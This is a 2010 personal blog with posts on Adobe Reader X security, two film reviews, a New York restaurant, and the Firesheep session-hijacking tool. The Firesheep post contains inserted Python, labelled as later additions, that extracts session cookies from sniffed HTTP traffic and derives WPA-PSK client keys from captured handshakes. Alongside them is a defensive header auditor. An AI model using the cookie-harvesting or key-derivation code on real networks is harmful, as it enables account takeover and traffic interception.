All that is wrong with the world…

November 22, 2010

Adobe Reader X

Filed under: Security — Tags: , , , , , — allthatiswrong @ 11:20 am

A few days ago the long awaited Adobe Reader X was released. Given that Adobe Reader and Flash have been the primary attack vectors on PCs for the last few years (with them reportedly responsible for over 80% of attacks in 2009 alone), a secure version of Reader is long overdue. It is a sad state of affairs that a PDF viewer needs a sandbox in the first place, but given the reality of the situation it is good to see Adobe finally stepping up. The question is, did they do a good job? Adobe have an atrocious track record when it comes to security, but going by their blog it seems they worked closely with experts, so hopefully it is as good as can be expected.

The initial impressions upon first using Reader X were not great. The setup file is quite a bit larger: 35MB compared to 26MB for 9.4. Nothing really seems to have changed except for the sandbox and the ability to comment on PDFs built in to the reader, which I guess is nice. The toolbar seems to be using a different widget set and it now looks cartoonier, which I don't like at all. I had originally thought the toolbar had disappeared from the browser plugin, which would make it harder to navigate pages, but it is actually a minimal toolbar on autohide at the bottom of the screen. While not intuitive it is a big improvement. For some reason the installer still places a shortcut on your desktop as it has for years. I've never understood that, as I have no desire to stare at a grey screen.

The security changes are more interesting. Reader now runs as a low integrity process in addition to the sandbox, and has full DEP and ASLR support. There are no customisation options for the sandbox that I could find, but none are really needed. The sandbox is only in the Windows version, so OS X, Linux and Android users are still left unprotected. As per the Adobe blog post above, all write attempts are sandboxed by default; Adobe's own description of this first release is that only write operations are restricted, not reads, so the sandbox is aimed at stopping an exploit from persisting on the machine rather than at stopping it reading files the user can already read. Even so, this should stop most drive by download attempts in their tracks, since the payload cannot write itself to disk or to the registry. It isn't terribly easy to tell whether Protected Mode is on or not: you have to look at the advanced properties of the PDF you are currently viewing, and the switch itself is buried in the General preferences. It seems however that Adobe is aware of this and other problems and will work on them in future releases. I am actually having trouble finding any further detailed information on the new Protected Mode, as clicking the link on the website simply shows me a nice generic image of Adobe Reader.

I often see the point come up that using an alternative PDF reader such as Foxit or Sumatra will provide better security. This is simply false. Neither Sumatra nor Foxit have DEP or ASLR support (which is trivial to enable: the /NXCOMPAT and /DYNAMICBASE linker flags on Windows) and they act buggy if forced to run as a low integrity process. They also lack an equivalent to the Enhanced Security mode present in Adobe Reader since 9.3, which requires confirmation for certain actions. Many PDF exploits rely on features that every reader implements rather than on a bug specific to one of them, and in that case Adobe Reader actually has better mitigation techniques than any other reader. The gain in security through obscurity from using these other readers is far less than the gain from the mitigation techniques present in Reader X. With the introduction of a sandbox, Adobe Reader X is clearly the most secure choice at the moment. In addition to the security aspects, the other readers are simply not good enough to be a replacement yet, as they have problems with overly large files or lack compatibility entirely for features such as forms.

I wonder when Flash will gain a similar sandbox, as it is another primary attack vector these days, if not more so than PDFs. Flash is still being targeted, such as in this recent attack, yet I have heard of no plans for Adobe to make security a priority for Flash as they have for Reader, which is kind of strange.

What the last few years of PDF and Flash exploits have shown is that DAC continues to be a poor access control model for a modern desktop environment. There is simply no reason that a program started by a user should inherit the full rights of that user. If we had an easy to use MAC implementation that was mostly transparent, then most of these exploits would not be an issue; in many cases the payload would have nothing it was allowed to do once it got control of the reader. The industry seems to be slowly heading in that direction, and features like sandboxing and integrity levels for processes are a good start. They will suffice for the meantime, until operating systems let us easily sandbox risky or untrusted applications instead of relying on each program to implement its own version. In the meanwhile, applications that are not sandboxed can be run inside Sandboxie, although it is not as effective on 64-bit versions of Windows because Kernel Patch Protection stops it hooking the kernel the way it does on 32-bit. I am not aware of any sandboxing applications on OS X, and of course on Linux you can use a jail or one of the main MAC implementations such as SELinux or AppArmor.

November 21, 2010

Thoughts on I love you Phillip Morris

Filed under: Entertainment — Tags: , , , — allthatiswrong @ 9:14 pm

I managed to watch I love you Phillip Morris after having it on my PC for almost a year. Not many people have heard of it due to an idiotic decision to distribute the movie. The movie is excellent with a great performance by Jim Carrey. He doesn’t tend to do comedy that often anymore and this isn’t purely a comedy, even so he shines given the chance. It’s interesting to note the comedy in this film is a lot more subtle which is always interesting to contrast to his not so subtle beginnings.

The story is basically a love story of two men who meet in jail. Ewan McGregor also does a great turn as Jim Carrey's lover, and the two play off each other perfectly. The movie does not pay much attention to his family life before he revealed he was gay, and the transition happens quite quickly in the film. Likewise the many ingenious escape attempts made by Stephen Jay Russell (played by Carrey) are not given much attention and are shown in a more comedic light. These things don't hurt the film, but I think it would have been interesting to look at it from a more serious point of view. Then again, there are documentaries for that purpose.

It is never stated explicitly what time period the film is set in, although it appears to be the late 80s/early 90s going by the size of the cell phones used. Another interesting thing is how the police repeatedly refer to the characters as 'faggot'. I wonder how much that has changed, or if it is still prevalent, especially in places like Texas.

I am glad the movie brought to my attention the story of the main character, Stephen Jay Russell. I think it makes for an interesting example in an argument about the current prison system being as fucked up as it is. Yes, the guy broke the law, but he is currently serving a 144 year life sentence with 23 hours a day in solitary. That is very obviously wrong and not at all proportionate to the crime he committed. I would question whether he should be in jail at all, given that he is obviously intelligent and could be serving society in much more beneficial ways.

The saddest thing about this movie is that it has not gotten distribution, despite being out for almost two years. The obvious reason is the homosexual love story. People love a good con film and a good love story, so with the two combined the film should have been at least moderately popular. The film is not even overtly gay; the one gay sex scene lasts only a few seconds and is not terribly explicit. Indeed most of the film is actually romantic. Unfortunately, much like the homophobic police in the movie, film distribution companies have yet to realise that sexual orientation simply shouldn't matter.

November 5, 2010

Thoughts on Firesheep

Filed under: Security — Tags: , , , , , , — allthatiswrong @ 3:25 am

Over the last week there has been a lot of discussion over the release of the Firesheep addon for Firefox. Firesheep made the news because it allows anyone on the same network to impersonate someone else on the vast majority of websites on the net. This is known as session hijacking or "sidejacking". The problem occurs because most websites only encrypt the login process, which prevents people from sniffing your username and password, but then redirect you to a non-SSL page. From that point on the browser attaches your session cookie, the unique identifier that tells the site who you are after you have logged in, to every plain HTTP request, so anyone sniffing the network can simply copy it into their own browser. Someone who has hijacked your session doesn't have your username and password, but will still be logged in as you.
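To make the mechanism concrete, here is an added example (my own code, not Firesheep's and not part of the original post) that does what Firesheep does at its core: read plaintext HTTP requests off the wire and pull out the cookies that identify a logged-in session. The captured payloads, host names and cookie names are constructed for the example; the list of session cookie names is a generic assumption, whereas Firesheep ships a per-site list.

```python
"""Harvest session cookies from captured plaintext HTTP requests.

Added example, not code from Firesheep or the original post. It shows why
an HTTPS login followed by plain HTTP browsing is exploitable: the session
cookie rides along in the clear on every subsequent request. The captured
payloads below are constructed by hand; host and cookie names are made up.
"""
from typing import Dict, List, Optional, Tuple

# Constructed TCP payloads as an attacker on the same LAN would see them.
# The port 80 ones are readable HTTP; the last is the start of a TLS
# ClientHello on port 443 and carries nothing an attacker can use.
CAPTURED: List[Tuple[int, bytes]] = [
    (80, b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
         b"Cookie: sid=8d41c0f2; lang=en\r\nUser-Agent: x\r\n\r\n"),
    (80, b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
         b"Cookie: SESSION=abc123; tracking=1\r\n\r\n"),
    (443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),  # TLS, opaque
]

# Cookie names that usually identify a logged-in session. This generic
# heuristic is an assumption for the example; Firesheep uses per-site lists.
SESSION_NAMES = {"sid", "session", "sessionid", "phpsessid", "jsessionid"}


def parse_http_request(payload: bytes) -> Optional[Tuple[str, Dict[str, str]]]:
    """Return (host, cookies) for a plaintext HTTP request, or None otherwise."""
    head, sep, _ = payload.partition(b"\r\n\r\n")
    if not sep:
        return None  # no complete header block: not HTTP, or still fragmentary
    lines = head.decode("latin-1").split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or not request_line[2].startswith("HTTP/"):
        return None
    host, cookies = None, {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value
        elif name == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                if k:
                    cookies[k] = v
    if host is None:
        return None
    return host, cookies


def harvest(captured: List[Tuple[int, bytes]]) -> Dict[str, Dict[str, str]]:
    """Map each host to the session cookies that were observed in clear text."""
    found: Dict[str, Dict[str, str]] = {}
    for port, payload in captured:
        if port == 443:
            continue  # encrypted; nothing to read without the TLS keys
        parsed = parse_http_request(payload)
        if parsed is None:
            continue
        host, cookies = parsed
        sessions = {k: v for k, v in cookies.items() if k.lower() in SESSION_NAMES}
        if sessions:
            found.setdefault(host, {}).update(sessions)
    return found


if __name__ == "__main__":
    for host, cookies in harvest(CAPTURED).items():
        print(host, cookies)
```

The TLS payload contributes nothing, which is the whole point: a site that keeps the session on HTTPS leaves this harvester with an empty result.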

There has been a bit of controversy over Firesheep because some people are convinced that the person who wrote the extension should be held accountable, or at the least did something wrong. Nay. Those people are simply misguided. Releasing a tool like Firesheep is the essence of responsible disclosure. The generally agreed process for dealing with exploits is to contact the developer privately to work on a fix, and to reveal the exploit together with the fix so both the company and the researcher get credit. If the developer refuses to fix the flaw, then a proof of concept exploit is released to push the developer into doing the right thing. Firesheep is simply another proof of concept exploit for a problem that has been around for many, many years. It isn't as if people were not made aware at least once before.

Facebook seems to have been getting the most press, although most sites are vulnerable: most web email services, Amazon, other social networking sites, forums, pretty much anything you can think of. The strange thing is that most people don't seem to care. This is generally because people don't understand the risk or think that they won't be a target. This is why the release of something like Firesheep is a good thing, a fantastic attempt at actually illustrating the threat. No doubt its use will become more widespread, and as more people start to get taken advantage of there will be a greater push for security that will benefit everyone.

I found it interesting that somebody went to the trouble of writing FireShepherd. FireShepherd is a tool that exploits a bug in Firesheep to prevent it from working. It doesn't accomplish anything and will likely be rendered obsolete by the next version. If something like FireShepherd were to be useful it should pollute the airwaves with fake sessions, although even this would not work terribly well.

I wanted to clear up some misconceptions that have sprung up in the wake of Firesheep's release, as a lot of bad advice seems to be being given out. First of all, logging out does not automatically make you safe. Many websites do not invalidate the session on the server when you log out, which means that even after you have logged out whoever is holding your session cookie can continue to use it.

You are not automatically protected by using an encrypted wireless network. WEP uses a single key shared by every client, so any authorised client can decrypt everyone else's traffic, and besides it can be cracked in seconds. WPA and WPA2 in PSK mode use a Pre-Shared Key, and anyone with that key who also captures a client's 4-way handshake (the nonces and MAC addresses in it are sent in the clear) can derive that client's session key and decrypt its traffic; Wireshark will do this for you given the passphrase and the handshake. Firesheep may not do this out of the box, but it would not be difficult to adapt it. Even on a wired network you may not be safe, due to ARP poisoning or MAC address table overflow attacks that make a switch flood traffic to every port.
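The WPA-PSK point above is worth seeing in code, because it surprises people that a "secret" network key protects nothing from the other people who know it. The following is an added example, not part of the original post, implementing the standard PMK and PTK derivation from IEEE 802.11. The passphrase and SSID are the 802.11 Annex test vector ("password" / "IEEE"); the MAC addresses and nonces are constructed stand-ins for what would be captured from a victim's 4-way handshake.

```python
"""WPA/WPA2-PSK: why knowing the passphrase lets you decrypt other clients.

Added example, not from the original post. Every client derives the same
PMK from the passphrase and SSID. The per-client PTK then depends only on
the PMK plus values that travel in the clear in the 4-way handshake (both
MAC addresses and both nonces), so a neighbour who knows the passphrase
and sniffed a client's handshake can compute that client's PTK. Passphrase
and SSID are the IEEE 802.11 Annex test vector; MACs and nonces below are
constructed for the example.
"""
import hashlib
import hmac

PASSPHRASE = "password"
SSID = "IEEE"


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_handshake(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the public handshake values (64 bytes; CCMP uses the first 48)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


# Constructed handshake values for one victim client on the network.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def attacker_recovers_ptk() -> bytes:
    """What a neighbour who knows the PSK and sniffed the handshake can compute."""
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    return ptk_from_handshake(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)


if __name__ == "__main__":
    print("shared PMK:", pmk_from_passphrase(PASSPHRASE, SSID).hex())
    print("victim PTK:", attacker_recovers_ptk().hex())
```

Nothing in the derivation is secret to a legitimate client except the passphrase, which every legitimate client has. That is the difference from WPA2-Enterprise, where each client gets its own PMK from the authentication server.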

Some people have recommended using a VPN or SSH tunnelling, which are among the best solutions. They are not a cure, but it is a whole lot less likely that someone is sniffing anything from your ISP's connection upwards than that there will be some douchebag at Starbucks looking for someone to take advantage of. Either of these is the best option at present, as they let you encrypt all traffic up to a point where only employees or authorised personnel would be in a position to take advantage of your unencrypted sessions.

What most people have been suggesting is to use an extension that forces sites to use SSL all the time. The two most suggested addons are HTTPS Everywhere by the EFF and Force-TLS. NoScript also has this capability. There is a similar addon for Chrome called KB SSL Enforcer, however it is quite insecure at present. Because of the limited Chrome extension framework, every site request goes out over HTTP first and is only redirected afterwards, so the session cookie is still leaked on that first request and can be abused.

Force-TLS and NoScript implement HSTS, the Strict-Transport-Security header, which relies on the server to send it; HTTPS Everywhere instead ships hand-written rewrite rules for each site. If the server does send the header then the entire session can be kept encrypted. Unfortunately not many sites support HSTS at present, and forcing an SSL session by rewriting HTTP requests is not ideal. Some websites will break if you try this, such as chat no longer working in Facebook. Some sites may not load at all because they depend on HTTP content for various reasons, such as hardcoded links or content from another domain. Even if a website supports wholly SSL sessions there may still be information leaks, such as AJAX requests going out over plain HTTP, or a fallback to HTTP such as happened to Google a few years ago.

The only decent solution is for websites to implement sitewide SSL: cookies set with the Secure flag, so the browser never sends them over plain HTTP, and SSL for everything from the login onwards. No fallback to plain HTTP, at all. Of course, this approach has attracted some criticism. People claim that SSL is too expensive, but this simply isn't true. Google showed earlier this year that switching Gmail to SSL by default cost less than 1% of CPU load and under 2% of network overhead. If Google can manage this, Facebook and Amazon sure as hell can. People say performance will suffer because you can't cache with SSL, but this is false; you just have to set Cache-Control: public on the responses that are safe to cache. Then there are people who complain about needing a dedicated IP per certificate, which is also false thanks to SNI, although some very old clients such as IE on Windows XP do not support it. Basically, in this day and age, there is very little reason not to have an entirely encrypted session for anything remotely valuable. It is appalling that so many companies and sites have ignored this problem for so long, and I think it is great that Firesheep has brought attention to the problem, again.
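As an added example (my own code, not from the original post or any of the tools it mentions), here is a small auditor for the response-side checklist above: the Secure and HttpOnly flags on session cookies, a Strict-Transport-Security header with a reasonable max-age, and a look at Cache-Control to show that public caching and HTTPS are not mutually exclusive. The two responses, the host and the cookie name are constructed; the six-month HSTS threshold is a choice made for this example.

```python
"""Audit HTTP response headers for sitewide-SSL hygiene.

Added example, not from the original post. A cookie without the Secure
flag is sent by the browser over plain HTTP, which is exactly what
Firesheep harvests; HttpOnly keeps it away from script; HSTS tells the
browser never to fall back to HTTP. The two responses are constructed.
"""
from typing import Dict, List, Tuple

WEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sid=8d41c0f2; Path=/\r\n"
    "Cache-Control: private\r\n\r\n"
)
HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sid=8d41c0f2; Path=/; Secure; HttpOnly\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Cache-Control: public, max-age=600\r\n\r\n"
)

MIN_HSTS_AGE = 180 * 24 * 3600  # six months; threshold chosen for this example


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Lower-cased header name -> list of values, preserving repeats."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def cookie_attrs(set_cookie: str) -> Tuple[str, Dict[str, str]]:
    """Split a Set-Cookie value into (cookie name, {attribute_lower: value})."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].partition("=")[0]
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name, attrs


def hsts_max_age(value: str) -> int:
    """Return the max-age directive of an HSTS header, or 0 if absent/invalid."""
    for directive in value.split(";"):
        k, _, v = directive.strip().partition("=")
        if k.strip().lower() == "max-age":
            try:
                return int(v.strip().strip('"'))
            except ValueError:
                return 0
    return 0


def publicly_cacheable(raw: str) -> bool:
    """True if the response allows shared caches; HTTPS does not prevent this."""
    for value in parse_headers(raw).get("cache-control", []):
        if "public" in [d.strip().lower() for d in value.split(",")]:
            return True
    return False


def audit(raw: str) -> List[str]:
    """Return findings for one response; an empty list means it passes."""
    findings = []
    headers = parse_headers(raw)
    for sc in headers.get("set-cookie", []):
        name, attrs = cookie_attrs(sc)
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure: browser will send it over plain HTTP")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly: readable by injected script")
    hsts = headers.get("strict-transport-security")
    if not hsts:
        findings.append("no Strict-Transport-Security header: browser may fall back to HTTP")
    elif hsts_max_age(hsts[0]) < MIN_HSTS_AGE:
        findings.append("Strict-Transport-Security max-age is shorter than six months")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(resp) or "OK", "cacheable:", publicly_cacheable(resp))
```

Run against a real site by pasting the raw headers from a browser's network panel into the strings; the Secure flag finding is the one that maps directly onto what Firesheep steals.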

Of course, I don't expect anything to change, although in another few years there will probably be a similar tool released and the discussion will start up again, at which point there truly won't be any excuse for unencrypted sessions to be the default.

Update – November 11th 2010

A few days after I wrote the above, a tool called BlackSheep was released which aims to help people detect someone using Firesheep on a network. The tool does what I described above: it sends out fake sessions and reports when one is accessed. I haven't looked at it in detail, but I would think it could easily be mitigated, either by learning to identify the type of sessions BlackSheep sends out or by finding some other way to detect or disable it. This just turns into a never ending cat and mouse game, all the while ignoring the real problem.

I was made aware of an addon for Firefox, SSLPasswdWarning. This addon will alert you if your password or other sensitive information is about to be transmitted over an insecure connection, so it is useful in helping to determine whether there is a risk or not.

November 3, 2010

Thoughts on Buried

Filed under: Entertainment — Tags: , , — allthatiswrong @ 2:57 am

I managed to see Buried a few days ago on the last day it was playing which I was thankful for. I had wanted to make sure I saw this movie in the cinema rather than on my laptop screen as it sounded amazing and got nothing but high praise from critics I trust. A film that was on a blacklist for many years due to being considered unfilmable had now apparently been turned into a masterpiece starring the much underrated Ryan Reynolds.

While it was enjoyable, I found it didn’t really live up to expectations. Despite most people claiming it invoked a claustrophobic feeling or tense atmosphere, I didn’t get any of that. I found it entertaining and intriguing more than anything. I’m not exactly sure why I didn’t feel tense…possibly because I expected that Paul Conroy was going to inevitably escape. The fact that didn’t happen was interesting but ultimately didn’t change anything. With this sort of movie I guess it is hard to change the expectations that the audience is going to have. Ryan Reynolds gives a great performance and while you don’t know the character very well it is trivial to identify with his plight. Things are kept interesting throughout the movie as he desperately tries to find someone to help him by calling 911, his employers, his wife, the FBI, trying to reason with his captors etc.

For a film that is entirely shot in a box the film never becomes visually boring. Everything is made visual, from his calls on his phone to the sources of light. Everything that starts happening to him is shown visually, such as finding supplies, sand starting to cave in, finding an unwelcome snake sharing his space. I never once felt bored during the film, but at the same time I never felt that attached. I was always interested to see where the film was going, but I expected it to have an atmosphere closer to The Departed or Frozen or something. Something to invoke concern and anxiousness rather than casually seeing where the story goes. I do think it is amazing that the film is shot with the character in the coffin the entire time, not leaving it once, although this also results in some strange decisions. There is one point where the camera zooms out for maybe a whole minute as the coffin gets smaller and further away, which just feels out of place.

The main thing I thought about from the film was that it reminded me of how much people can suck, much like District 9 did. I can understand the position the US Government takes given what they are faced with, but there is little excuse for the cold indifference and lack of concern displayed by nearly every person that he calls. Possibly the worst moment in the movie is when his employer fires him over the phone to eliminate him as a liability and then makes him participate in a recorded interview to cover their asses. It's conduct like that that I would hope corporations burn for.

There were a few things that seemed strange. It is pointed out to him that he is probably only 2 or 3 feet below ground, and the coffin he is in is shown to be rather weak and poor enough to let in a snake as well as a horde of sand. Given that the coffin is also larger than normal, why not do your best to kick your way out? Surely with the added adrenaline breaking through a rotting, poorly held together wooden box would not be that difficult? I suppose if he did this it would be the end of the movie quite quickly, although I would have liked it if he had at least tried.

I know that a lot of people were talking about the movie being an allegory for the war in Iraq, although I have to say I didn’t really see this at all. It might be there, but it could also be something that is very easy to project onto the movie. Buried is definitely an entertaining movie although I don’t think it lives up to the hype. I will be very interested to see in which direction the director Rodrigo Cortés goes next.

November 2, 2010


Filed under: Travel — Tags: , , , , — allthatiswrong @ 3:40 am

The last time I was in NYC one of my friends introduced me to Shopsin's. I had never heard of this restaurant, which is pretty amazing. The owner is known for having a lot of strict rules and creating hundreds of different dishes, many of which are strange combinations. The menu changes fairly frequently but it seems to be kept up to date on the website, to get an idea. Some of the rules are quite interesting, such as no party larger than 3 being allowed regardless of whether the restaurant is empty or not, and no two people in a party being allowed to order the same dish. Some of these rules seem stupid and just exist at the whim of the owner, which is fine since it's his place, although I can't help but wonder at the reasoning behind them. An easy path to notoriety? Pet hates?

Apparently you really have to be aware of the rules before going in or run the risk of being sworn at and made to leave. The friend I went with was on good terms with the people there so there were no problems, although I have heard of a family who came because the restaurant was listed in a guide book being cussed out and driven away. That is certainly an interesting stance to take, and while I understand the sentiment it doesn't seem necessary to take it out on an unsuspecting family.

The owner, Kenny Shopsin, is apparently quite famous for having outspoken views on everything, which the documentary on the restaurant was meant to give a glimpse of. After watching the documentary, I really didn't see anything particularly special about the guy's views. Some of his views were certainly interesting; for instance, he considered that since he had been operating his shop at his previous location for over 30 years he has every right to dictate what the customers can and cannot do. It's his place and he has been there for such a long time, why not? If you can work this attitude into your business model successfully, then go for it I guess. Overall the documentary isn't that great, as it doesn't give a lot of insight into his philosophy nor highlight the interesting dishes he makes; it's basically just watching the family for a few days. He does have a book out, which I have not read, but it would no doubt give a lot of insight into the man, being in his own words and all.

The dishes themselves seemed interesting, however none of them seemed particularly filling. A lot of the combinations seem great, although you may not like one or two of the items, which can be annoying as one of the rules is that you cannot ask to change anything on the menu. It can make choosing take quite a bit longer than it already does on such a large menu. I ended up getting the superbowl tray to try everything, which at the time consisted of coconut shrimp, 2 tacos, samosas, rice and beans, duck drumsticks and a banana and strawberry or raspberry cannoli, if I remember correctly. Certainly delicious and I would go back to sample other items, but the food is certainly not worth any insults if I were to encounter that. Looking at the current menu, the superbowl tray has already changed significantly.

One thing I have wondered about is whether it is inevitable that Shopsin's will be parodied on some sitcom or worked into a drama at some stage. The infamous Soup Nazi episode of Seinfeld made Al Yeganeh's Soup Kitchen International known to many people, whereas before it was a well known secret. Shopsin's is somewhat similar, although with a movie and book based on the restaurant perhaps it is not such a niche thing. Perhaps the idea is considered too similar to the Soup Nazi? A place to get amazing food where the owner can be considered mean and has a lot of strange, strictly enforced rules? Surely the rules are different enough, and the unique aspect of having such a great variety of ever changing dishes would allow for a fresh take on the idea? If it were to appear in a sitcom, however, there is a shortage of NYC based sitcoms at present. Only 30 Rock or How I Met Your Mother would be suited, and I can't think of it working too well in either show.

Update 1 – January 27th 2011

I'm writing this slightly more than 10 days after I actually went to Shopsin's a second time, during the snow storm in NYC, but still, better late than never. So, after arriving on Saturday and running into my friends and vaping for that night, we decided to go to Shopsin's the next day. The biggest change I noticed from going there in July is that it seemed to be a lot more famous now; a lot more people were walking past and talking about it or coming just to look, and there were actually lines now.

It was interesting going with my friend who is good friends with Kenny. Despite being at the end of the line with all the tables seated, Kenny got an assistant to bring out a spare table so we could both sit down, skipping everyone in line. It was only then I got a sense of just how much my friend was on good terms with Kenny. It's perhaps mean, but I couldn't help noticing a table of 3 very large women gorging themselves; while the two largest were having trouble finishing, the shortest and plumpest had already finished her superbowl tray and was looking for more. Anyway. It really is good food.

They made a bowl of étouffée by mistake which my friend got for half price, while I had avocado grilled cheese, grilled tikka chicken, onion strings and chilli mac. It was quite delicious, although I had thought the price was $17 when it was actually $24. I probably would have gotten something more inventive had I realised all the lunch trays were the same price, but still, it was absolutely delicious. I hope to go back before I leave in the next few days, as it will be cheap Mexican food for the next few months after.